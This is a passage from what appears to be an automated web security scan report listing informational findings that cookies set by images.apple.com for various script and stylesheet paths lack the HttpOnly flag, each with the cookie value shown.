ccl=XqG24RKHiB3KpZrwS31AIT/E4Q0vvokPyR0Q0jStmM3MNmh8FcxhQM6VXsEXg4CZ6nF5NN8C6ez+JxhEEfuJyLXihr3cN80waGouuki0UrqjcxlKbUtxl8eidcsQAeG8BXEi6mkyhAaOf72yr9luI+vdfzfQ/Bo1CNE+i3SWJJiy56nPmFjGFsePEoSTPOG+bJCLKqwLRW/1Fd5xyQjWptxhL9uBv2XFCjKDg0Pu2hO7gQjD6ysCAJM3qYTQWH4pZ//82ogWBRgTZrBwLwFs9GRubDUERaR2F+4iQLL4rnUgUBlpNh7guqotbh6g8ifxm5zNu97KG4zZ6vZBeWJmuCdNfYzPeEoJsZyAORrxqANJlqUNewm81R987stPeXkZv4nFLSFTcS2AC/Mno5+uXmRy1gYLkeCbHCfawurIgyOafvcxnRZBHgkGFS23YeYiofWcTPAZeaAsu37YAIcSpzx31YwwfaV3baJdWKQ6pi3EEHT7yRFpajDy9M6h06cKNcWy6pVJxcFmU8SrKB0Y3v5Ym7WKE0XUbzBHx+uJOg29fzmBsAqQzjCvsPAieBOa; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.109. http://images.apple.com/global/scripts/content_swap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/content_swap.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=38kPq7Obg7hj3EcO8NV+iPwuCIfL/YIABmCQzt6idGqWtpgBpd3yyenso9BIdpe2S4+0DTabJ/hUJzf+n+mgcvjeQ3VHN0jesPt3/8KsJib2yytp6UvDVSgf8Z4cOZxGkIEPbD0y3pbn6wRZwwBLuaMjm5aravqXDkWqH3Hqrp5LDM29N//ap+0zkEoEQ/75yaQIdCawUD0ime98CB2tFnC3TN2oxHDO2FAwql7UDJ5Sw646Wn8m6/6xWQa2qUI5aYycJk2urhuKaD/epybRLiC/zRGfP+SswiqiOxRtlcD74yZG2WTEzct1JxmTcjQy+ZPjJWqMYZdcS+UG3PCNytcZhTGSem0MvcLnfdcpk3/IXTRL7fEAulcAK7AepSR+XSNgaFU6aFLGAOeY9QHeOVhvLjRW/QsKDp6fNJJi1mYbotDWNhUqQ7Gp+F+icUxDETUvJDHSdM0UkvuDLWgDfhNe+kBATYHSCXWgTQSSrd+V7/r/HLuDu6oodVGokdaaSmUQH2xGJLEFvoToziOgz6K6lR48Cd0Ksdhwkq+EyGfbLenoY26i2wf54doeq1gP; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.110. http://images.apple.com/global/scripts/lib/event_mixins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/event_mixins.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=MqNfKdfUxnHaugTWYvweLP0Dkj+Nvys7qv+ZWMXUQm8HnpbtTAlXqX+8InJIUMKfuacZciKXabjPs6+XoKh3NeZDjUC75OjiyrNKRg//HjEqBK4FPZflkewt6xuiKv2CX44o/sE58txVoWiB6xd502lVxiYAJIm+D03M35cdwPm1tGVuBMajZwgcGroyVLqxfnwETXcrnWXEHbHhqnKWGujeQP6DOlhBzYBUZ5rpqBXf6rn+M4adZAu8TeKsffgINmTv1TkCK1jsKS+Co8S7B7eZkC527mRN3bYupQN+EV3dR/ekSgaqBw3NSAAoTHClZLOU3Q83KGNr224ShqRDrHyakp1Pr9RA0gaWHJRD7C5cQ2Tj00s2UzHQy2o7Jm6bStQjZvBoEDVgDwl41htriBmeui/kNDlGCoO+6YkAlQbXYDtRQ1irq3Cng2fe4LTrxHxYLelQserOwPx5+AhuylH1LHG7piVpIGBUmCeP0K5o/71PHDPnentJQrl3Q4aDieEgxnQ31vspDec2OQgHgKIDDrcA+t3snK7HusYctUuJCx+UcIbuRkHzLf5zZQjo; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.111. http://images.apple.com/global/scripts/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=U2CNK85JNj94QtkGAOJJcLYU6aotDUT8/VnNYZa8mKq0Uy3bWbHsLeLUk+noEHEoOgW2zrUHSJKsdpHu0XMaiOY2l/M3UW5t7hMvBHlagy+65saoFHlEQuTH/D60OMDZfgwQWSyJ0isaMPjwSXNtJVNDIjXhbr/ZycWJbuSNIQLSAet8oyHgVKAZmx3tJhkMo6WWQgYGaqhpAWOoiC4SDvilGaUof7WEpfQC4MPq17rbgnD+ycV7EX7NOpVxlXExnMrjWj0i6PDKa0MUd7JtV7qI3FFiG1YhW69Sc70Xeg0d4VVhYP9FEmjw/qgK3F5EswIFV/oCEowS6Ua8ZQlc7ckxt83UZYPx5NTDlq/tXtJBIwqke3rRpj6UKJtV+v/MozGrcMOoh/sapTfpmF8ZGb2vlM9+bwnSgp9OK7D6iWfyLB5fdTq3DPwL2e3rHLkm3ECcxgTtUuyHoPru/k72JYXx7G1vDazMFjy10FioDn/nZ2MVZjUujhEPNSUtll2nb652l3QwWb9gQ9JAumY7XBg/JB0JwTMw3hqwECNFOLWyGTc6NJUZT4Ytyb715ZVk; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.112. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=5tsYVJ7cmasQfcp7422EF2RMK52d23uaTxp8NJCDi1GIMLhyGot+j2/pISgaWY7pillK5xJdZjm5DvCQ84+h7I9TE8hpoQb2j6giFHX9m2+TiiU/RtilVWHLYpk+Pl0yJOoP5NdE1aZyQnmxgdw+g3oEnOdHO96c76vKcwcRBWHAGtCwye3FEAp+m2JmQblnVmYcNfIA1mY5WtRBkbBiCRYJZtXEjHDMVvIEGj5gPvJWrlxxL7vWUivEfmgsfUfCTghrfVf3molhY4Ygucag8oI1xju0QZMIOQ1zDMl34cYku5Y+LOw95M+KcGj7zJfZZvMJweMGqBppApy2gbPARsIuoaGbxQNhq1cglJUic3P1zwQsrhMvPViRC4hgs4buQ6DBL5zVNUHlb1+BOqtc8yz450geLyHqV4YyuMg+1FA7kG51hLhO05PO6Nyut4voY4n9YLnEi3r7byI75pelAxcVeMfkOhDX1rQ6ef4v4YjSPppoamzUVzAyndDt5dbS/4bjGvilpP7C3O9fsdy1HGUzp8SM3vJHDO7nLtSyCSQ7TaUQmWOYErH4d24zBymY; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.113. http://images.apple.com/global/scripts/overlay_panel.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/overlay_panel.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=BXVOOROra1Qz8RH4SfKdyZSoRDyNXNczFrNQEITI5G6UvaLpZ0p+vF3VNpmMUNj5QGZ8AI/Q/wVF7JEJW1OX6FdRn/XLLbE4NtlZC0vKcr+CzMsNv7GtRfs89g6dTjb7lG87e8deXDtNL/E/UFF4Ef0YFPD1kfT6hNGpeas4TBBnmQmPzwLFVdZ8hXfAhau15uosfupfkZ9V4lBvUAC06TFuz56w9/vNdeUyYJi9wAGPclO3PSFU0rpuPPBq0z/G6SK47lBNs5Fi2wTWXvyOAYMeNEN/nwX5vk3oqhsJwU/bRUApJgiuR8aTes6wTP1DmTRKw+M0mYIniXhQ0PrLRpj5IfnduQ3TZ70w/fAoAFZlsBcpjd9xHgE+K3dsNsIGoCEUmFlbsKVq4MzXWO0ZFXOrokbODXStD7nJwMRgbpbH87aTVy+x4BoG2tP7QlT0/X92YEsJ528fWvhkduRh5dwJCrOZc92YETK8307CxoFd5rSEuMBEPgaSuSaBmpyyVxbkuzGbMyp++GC4PQ/OaO6ek8SVoSTjTzrbS/P3xZ5K+Hmp01qQIkljkEpxNP5l; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.114. http://images.apple.com/global/scripts/promomanager.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/promomanager.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=b6Stj++nm2s6TmynjMSWZgABRXNpmPrdHeAwju92SofnOz/DkuCyRPZUGm/8QCxQttaFjEg2ZwfQ0xLAF4F6LG7HMa15T1P73JozupIGAor4YeflX0stvrEW4fPWXBxFDUO9H+tuJgXeHOgKNsQA2EJjYlO7VQelIyFnN3qi3oAzEDjPbW4fsBsc4ssCjpjSaCFgU9SAlfUsjpFYMhIYudI0AKctmPvKqMiEpmTypsnCV9sx+Jk5P/Osir+4uLjszfJmMC33MisT4I21QCYk7x9jC06npr9Bi6XsFAs8A6ks/GWO4nKpikBF67tA0Br1AEK/pmtFf+fAPCAiajgSwumjFl9o83Tlg47EN90c7Fz74qB6tUYIwMlGdq4AUWNymcUL9CLCPP5EaSq9bSg7kF3eFbUoH3N8XF1Yw0OQBQs/M03ilUEmIPLhSKYAGYJtOBcOlZUq8HFLuSk5NzHzWdkABX1AJ2s/qANgIpm3k+YgpbMxCb6F/6Ra7IDkDvuyjcvWs80Lw+kn/o0wSX1HAH//Jnx4wd7pLNyTGQqbbVq1cgAh2zWqZrQsq+EG4teZ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.115. http://images.apple.com/global/scripts/search_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=Ezx1Pkt3abA8NdS1czF+LqquA3OuoHceeKsm/ZvVkOd6+SwlkwcU1h6evC+MH8jMKdJzxj8LVTQSs4MARUcwhm5iv2kqgpVN0VYmDLdUBoGitlq1D+bvTLKATmqdgOg3NWCFMByIEWdvoIcWdlK3N35TM9bpxza5M7EoPFTfTElRo6cucID3wdp4k8SYf70eeqCPBuv9w8Q97hm+2PKuwEOLQHSBUwvinfkcX2Fy9CH0JW14l8jhda2D0e6IDuIvBtrGBVRS5/L7kFK2tBS08+/0yvnQi2Ak7kcbE0LTNZ7og5u0m+plwqwKQDpFCkgVh5wMRGBFferRpm5YjN5B38dMWymTjcU2JUFWF2wwckqlv6hJ3WkFmUEYDFyA42xAQpdghOglJvDBmc4fhks8EFwhAgEGCzzEZowKGbobFWxKprQz/rB2Apfms1aUA5xf44r1YzaBA/ObfRpSvVID65ZawD/P63VeTzfFE4Px+9GrP5XkCDAgD3ue36fdNwpiHFA5cJiXTKw8PlOt0RX52uutKNLpn7oHk2uOynAHESbYN8s6ZNo9mV4GsbgaiTra; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.116. http://images.apple.com/global/scripts/swap_view.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/swap_view.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=QOh4jx4Itby8kQi9jnQohd5AKVIII6cRIYTkpKCO03bAmYZA/0w5mescjVOcsvojYmjDgGwuiBbRTOwAaNmf1owHz9aa9dq1YcUWRGoz6Egi0JJnrFN9p6wBK/loeP1UNplt4Cs1gXlO6+t6b9/HaKACfBIgZuQCzB2I4rZjFKnK6gnYSbX5dHDFHGyMkM7VevaCP5U6HUKrleSyRv5Ugpq0x/e9nwSd5cxyqeLPEeDkSgIFqXt2pp3QXaGa1r77lEzqJLH7jjXU+Xi9vKK+2MW2vrPRTHhc+G57RvefvU+65L6t7VXHzZGxQsBmY1trSjTZGG+2RaG+otgWBh1D1C7M1K0B6GYx8dGhYwgKEI9MLalzdqCgo88cB2PrVPfM4eQcPhMHjiXk/E5VNlUFLOG1kHPAPF9RKghSU3kPLD6Hvhlu6a2uBdLDQQQjZINLqUJ4+ShWKF7YEe2GWzJnjdLKu2UzVYElW7s9jmHu/g0Vh8PeM4jAtpoVt8t9GO1QQ4nKLrtqai+4Nagf8v2PrfwGorxJmPJN1RabM607fQDFqHZ/xoabRPrSfFQ0G4RO; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.117. http://images.apple.com/global/scripts/view_master_tracker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/view_master_tracker.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=7IFllsyCCVnGt8q7GQXRaNThWwUx+MVHqCK8MQQytNQ/tr4v/g4yGiKKTpL4zros2/u8oSRD7FPcUZfeNxpwb800p5i7SO9Jw2kruLgM97GcrpE2C2KWrYrxgGghn2/LFg+7tavOS6ZmT82L6VcFLq6HrCA81JuHHhoG4pA9L4QrOndW4FZ9RZtnOgk24AAso67bpIhBFAoK69MZHpvUXW7C91waBEigMlnz9bXge2zDAJ/RzkFk0o6zQ/I0DOMZpNU5BnmIuavPfwtWXEKQlrZKa+nxIJseI2lpYR/TQeCRAiTFWp9aP+Rv/kbtZ6M/mDeg6FQldQgsvwbsG1995NjAewXYbTd0chk7RGqZcIboivju4a8h+L4b3WFW1TX3wjLhfXewNa64+Eybs6UadRCgNolgN367HXp6/dPTrmKftyn+PkNQKegOwv34Qce4HN675kWgBPlPq8Z6Q6+OBJlj/rBa2eTUJH0SqNKs1TBcPg/8kWxYLr9MiME+fto0JsKJiyE+biJoP4u+U0iByMvRaJpeUL2lE5Z7OBFIDPX5PrCZifVIpR7znYTPkd9U; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.118. http://images.apple.com/global/styles/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/styles/base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=nJ3IWRo4rjwalU5apUibcahtVnWwpmJjRdlEY9a/CmnllC4WvKQm5K4paNU56mnhoz0Qp5hYxDMkI+RADy1uOSOVTBaySyLsWkUR+eMyJ8lPSTT6ZvveH/MKEUBGhgIonx5Gv7f5e5zXLMcyUclPxSldzDnk19Y55Kzdjq7wKPzLARtkG5T73XVUNfqkw00/4roAFD226al/ZZ1pOTrMbx6+yzARCfmttQRdBLkNmNLVDJT8IGbgtZVfuC+JbSjzo6RpoPoVsh2GR2OosgB+TQNQk1fwtgAPeE4MsdNPfgqAmuhwPwvh7kN6OpvrJjlYGjxglXSR6twpBkF6y3RiJizDI3VC3XvudKL0Q6DRPeKtHZc1MQ9ykE6VDx5vl+eRXHWECmTzOjsUxgyHT6o/Hc/n9UuoaEKVNGLvuHp+WcnAIohxbRlJEo1IgYbk0Va6QGM4Ccm6slb3CRix+FFyOYAa/GXg5bf9gSR1pCpEyFjVZ9cGI+L3RuE4syQ8vekDdKQmyXcv3DwZ61DlMxpDzEUOdOW6JtsD7Dc6xCbPvtA9/3WKfqJANum/I8qiTAVh; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.119. http://images.apple.com/macpro/scripts/pagenav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/pagenav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=bY8lS6xZAGWbmWRFuc3xh/9dnR28FoZWwtpTqptUdgAV+Uc8maZ3uG7zk9Bg6lZH1rOO4gy76RWvGtPZLTeJbQhJ8WjnDDCGvqcXBPMtdP1uyTtE1T1+M90glWdKq5r5dnOnHYrX9QPWelnvU/8ycikpBsjR0AeagO+L5gY8nTiOivMiRfKCg0lesRfdS1s/VDNoK1HKE/lWZCJpcosN6Ah+8I2Rh1SmkNF1Q8pvmegi+ah3i5hcElOZJkifleDuns2oHOG5iEDXEwkpAYIkO+Scykv+qz42oppQXbfYRd/1ewsxxu3FH5nj0y8orNjgP7sHHVPwvJXmEbgwnjLIOwFyGGUkDesgmrMpE6n+a/KJZYnqJlrXXgVLT2ns3uiGyN/O3oOtBxHlHZT4EToNStQ6vcUPdww3NlZ2t0jqr+KnTyy8unAzhrVzCpqhr3Y5+8dlBamMOiwFaA6uBFoapHXkxDczUQ71k30oSe3rsPKATpxVjET3JqURqeqM8xIhz5+QicS8ukucXoPmWY049aIBGCa5/XoCD8whPsTspwI4wMaJT6e/yxtMu2eI2S8Z; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.120. http://images.apple.com/macpro/scripts/performance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/performance.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=pmWhRGeM3dXD4J38m3gIH86TAMIqjPWR3jW6M0fkWj3nVp7hT1FIS8/OVCmgmWsDeswgD1tIkHDND6aZ+vVWsn5TFz+flQBpkwAk4wUCzZIXfRbBxNdNmvZpC3GRlGSj/g4eX2vTjTTbpNw0CQw6c9HTSVM3ZfiD3IhKgtWfdS0aftATQU6ZowQiDkFDNczy1VtwReIIkfQufJF4geX71ql0AOtERpZXgd1zMGAS1sNj2EGe11BGncUiPHQb/sXRJuVxzgyhYsinBhNmMGndw3eXlcsHmGAAN7HY/lLss9A+yvEhmWIQ/vOUWFhmoCCoqo9UEdAnTVa33yD4D+d+Y/G2/0hM1sGfYvau/r3J2yh0wFzk99vtfjhg7w4CB94fcIsy0F3AqDWyx2UqYs5B3erd0x6yrY6sV3w6LuuTKWMxTMyorRAPlG9WadhRYYhIp/BNjwmd9Oyan5qSMrNYh0FmhU+M3JgD57yvlK1vGUG9Ly+SRpsSoDLRnKhhwiuoCkL/1QQ17Oo2tsf5du81nQ+vZi2fkry1SaO2k0I6hSySyc0CKFY0ZtUrHdQuQobh; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.121. http://images.apple.com/metrics/scripts/s_code_h.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/metrics/scripts/s_code_h.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=1feJpqNBoKHRzIn3m2Do2JhNRab7KsNr2B3KiNPmyVORh5FdrqXr2aSTI3bwRSZ43mChyXQ6H5W1qzp+1CPneJMoZGzToISFRrjZd5i1tnFNXBN++S7e5Kw4Eg0lDw/nBqaysNq92YGrN3KkfQeXohSV0fWGF1SDMOFVMT9STZf+3jwkPTqRCBWwXVyXOCRSXPc8JASCeFU5bG9NEm2ihqsdsBTNB2v1T8lVAfvjUTk8xKQOxm8Ze11wFUiZLNVWkzXvv4HSEZHW4Ijp9TXppRApIzpE2UNlYUQfKv98xEiTrLkqanwvkow0yGBcoL/soa+o9ZZEcGYB07TKA+ji/JqHyg1V2+KVpVAIHduPkWdDj9tkswKyxBLEzjYitsSMj0rdob+IhhAji+FmrI1cQc493i4NiIxEiNEAIYC/Qnh9nv4kYMX59xTFO7Yc9/bwlt3UNbXXlf2UauLVAPatCYOonfknvr2t6hwLyFCL0xtqDhq5aVpKSYAFvzwaJ+xsdhzv21dWl2BrfGtKf0auqlUpwjcqBsZJysmcQPm48Sy1/absFPm+HQQ0Dh4LnX1o; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.122. http://images.apple.com/support/css/base_new.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/base_new.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=/0ZX3eGtiz2N94LlrQRAkZzAM+tGhYMUJSxai0bwmBeI1dPPensQzY5Uty9ZlIOHIQTx3e60zFhRD6wMXmWNG926Lth/b8RjLMVCfZb7D5XbT3Dzmd93c9FsycW4PERXlZ3ycvoryZdz3+iNSPpF3jEkd6Iwedo6DKUcJxXiQPCmsq5B84TnqodRXIN41Os5MruCRagHNPml/PD83fqlyrp6Eah4dm713c10yU4DSe1ssFcZvJzMH1XiGUVgR8AZ0+k/K05YPhEhI01J2gZZji3qMvx5EphMLLteB32mWkWl3MNORmRAc6Fe+Tv8sV/ouT1xqrrb3C/9/vo3FPNIriwgYfHEUNRkaIYOGop4a9qfJk000LhgniRfVILO3khuwz54LEFRo+YplE//mp0nfYtMIpx3APNNKWmGpMqtElXz56voDUL5BEaC4Us1LVf6+0jaDoOhN/v9wIUOAQQ1xdU0uHO9YxmpWdWyHmQ4QTRGrK2eitc0M4r0/o8m+Hz+bzeUNNa7KrYyHu4O7h1CPxw1C1SET9/ArTDAGFrHfmWoFrXBm15q3+AkSAwWEteZ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.123. http://images.apple.com/support/css/global/nav/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/global/nav/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=y2zX0827C42NiOhmmL1InVWjcrGn40mRx8x7XyyYPFx1i+PinVQJQ5R5UvcDCrje7voysmLwI3gzWPmapj0sfjq6icY2ssQq/R6qK23/seLcMtkzor+8AYTSTelX8HocksDSOfxX2Zu27VLSH90TrQBr1NuqUYeJxBJEOntUMWehWDfcc4Zs013zwq4ICnv/dILW2btK0xQ1/VUUbe7cuAk6/tYIKS2NM2ZciOxnybIOf7XcUWvVo2eQtkxYB/NJzHn2SpbJKxqbP/QybCk0PdRtB/v3gC5soIK6P59QJRyKksTvA1WYByroUYoF6Rol7cuPREdX73N5A0ls/nv+L8w+B6TQJyifTGADdeRBNsaaU6Z+e9lX9vb6+jZBe4OrIflOTuHH8Ip01PH4qjCuMfugBF67v9GFpKmPi1XViSUrKiedDF6dHleQnvzCY24p6omSi6WIFEUn+dTRWkyUJjTQS6p8vSBQbBobqABA/CO9Dg3+nMuJ5WPrfEfV8y8zLdLa+m38oDPMpLOwjGuvn2liGwUBhf9GfKKfxOijl843dP2ExkOysse0ygPpk87+; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.124. http://images.apple.com/support/css/suggest2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/suggest2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=TdFxxK7XwGhvsKHfHII+mK0EzwI1AArHXsT8wlld8yJ6EcjP2MPmle1zSM1FmP+iwuWWHfsPyn9MWINOJq6vCoIg/GhLsCKsxPgyKeaz3d+KLsrsvNtckaiRo6wLJ+TcGlal4bHV9i41wEbk437fkuhMjyZksWdveLjxV1Vh8N8yAZJ5FfZXhm8upH5HxYlNjJnykqNpMpWUIN4FsD50t47pToBzsCzDECRpKn2bh9R3HAPD8UzKr/mUNelHXqRxqj9d81rpwV4EnXqHKc6cVSTPbyP7eMNkGGXG1nWXMCWdA+gPwfQhcmd+PYJs/2iYlsFJWGPxfFK1Q+FBKx3WSoNHzqXjilZS4se/MIs8cTf3P0NCXM4wbwJf0oHNxO8HrmnZ345dqRKTUsYtcR3B2rYN34JVhA89JOTssOU4g40St10+bioT+G6qGRgE5RDKjZ2IsO6UrrXHaR15yflphsjF4vhlQ5hjMwPOZ8xlDuy2g2KRLDZDihpa71abZqZVGq1/vrAcwf4canQ9uqbhJ7rSOjm2bPnXrPnd9Km65JrHJAChFfgQ4jnh6egASosF; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.125. http://images.apple.com/support/css/support.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/support.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=Ky+IPnhAs1w4J1fgLh/0Btv4CFTWH0oWnvNXYnVDtheHLkuBA4IuQUXMnDjdsuqwNio7AgOKpr0wpvTPX7l/vJvZlpycXTpvup1G8x+0QxIcYNWZNT0Gq8hm0JdQ5BE84XNcmbllD9FMKJ7WpbhFbkzcrHQQz9BOqfPyXzYPxdUap8sQxDi2LCg9ekmfFDcaeT9Z36QP+zP7scXvVK99ri01ltP0Ag/zITzXipquzvtRj7ZkaMQmH1WgDZa41vYfF8Q2T3SDiP3lggUC4sw10eKjs6Y7DUdMTFJN0UEtMzrMPo58ztdJHhETif/rBvVkLUe3Xyk4KejfA6CdNgJdSNHyPwWGcCeJCFi5DPGPg8zBLa+xUCeq4YILvCwFhqTMjqO5huysxRwX7oue8PkTBqIMJXD7y8N50Lz9S57XdGPK9KdskiogRW1bPMK+tONm0tScOLUIo7Q1BfpcTiqxIaa/TS8xJe3StKH1TihKH+CHgQXc37n3A5M300pGggbl4xyTFNH/Cp1Jkg8J6W9BK7vDTJWCrqEtyYNAgBCW9+3foQAvfVc30kDfP5qWCesD; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.126. http://images.apple.com/support/home/css/home2011.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/home/css/home2011.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=BrrKfyxbkX/V70rgbnyYChuybSz5m7J1+h6gWosxKcG9mKdKD/dhBe31bDbJznz7MU7lg0UhfMb4tls5bxPTE4052U4Pb5f8coy7ZfT+aTQann9QAclyeEBIH4Sj/9rG2sXXxWHR+h0zXZS2frG8al9ICOA0rimCJl7FW6Z9rStOuAZnQq+WHF2x9Y02R0W8G3IqNMHAtDMNu6CqPsSByCVje7q0c7R9ymfob97sJntC7iY0UDSLBfS0mPMB0mRXLazBOiO1FSEP29g1OzFPZ4+D2ecgDj6R14lp4XTHTR4OKAPpzCye+QllhhMXrei5CZi6DSNUC14Bds51GdJIUqaBf7maLWCALPxezRn0GNJsHglZ4jvG42nsbi/l0gf9Lxp1d1TtQstC2epHyUjBd6DXGNgJuTySbN8Q+kNf0ECLNzlnK/61BdCSY/aUDkUwZg7cHo94XpAesttapyfqlEDi9XhQLE1YNYZTdcwk9zJq25kcST6LGEVM8TXbzIqn+TEJ0R0CPsSvfIzLoTmGMaMEC6xHRSuLjemQUwbeRC8OW+/iEH5ewG/gkSyBt7Dy; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.127. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/iknow/scripts/ACQuicklinks2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=tmPjHWJRCJr07YFWPmKj4uzQva5U9xlEFPoMv2KODxJJaAECPt3oYIqsPV+vIIHK79qKAtLC1M1D/whD6ucvIw0sX068SxtsZ7ItOsLgZag8aMO78zVv3ffFH5xNq14BWnBMpEQJoQrjV7Yk0L71OU/cznHkn1ZJbkgihC4CNjuc3d5dF5nUKmvwmpf3FlX+VgNE9qsiKoEFrjERi1xqRY0uCpQlaSct7d1jNUXmzkQZV2RIisgIdEN8bWuWzV73ewShyfRTrjzvrG1g3To3Iy0TdhE2es5MwJYVYI5Ry3S+99excjgrcse+Wukao7ZPwCGAUBTNiqgyHPLyAKT55Z6C4CuEcsF/YqHD+9YiedNyUp+ekx0p81bJL5/h9NVPVyDA3sBPlRD6NlNqug6AyENo+61kcR8fmBz0bjCDLOuqQPErhuMlQw6KXjv91ykyCpWBjgWlVwNxDGmSH5rkWG1OMlxlxi0iSK0B5IROP02HATKMzpSi3noRxaGvbCB5eb7/wTJuCiGtQ/L7hWlGdUgsnu3YMDujcvs0lEGoucZkYeWUuuZRvMH5Eqb3ce/9; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.128. http://images.apple.com/support/iknow/scripts/ACShortcuts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/iknow/scripts/ACShortcuts.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

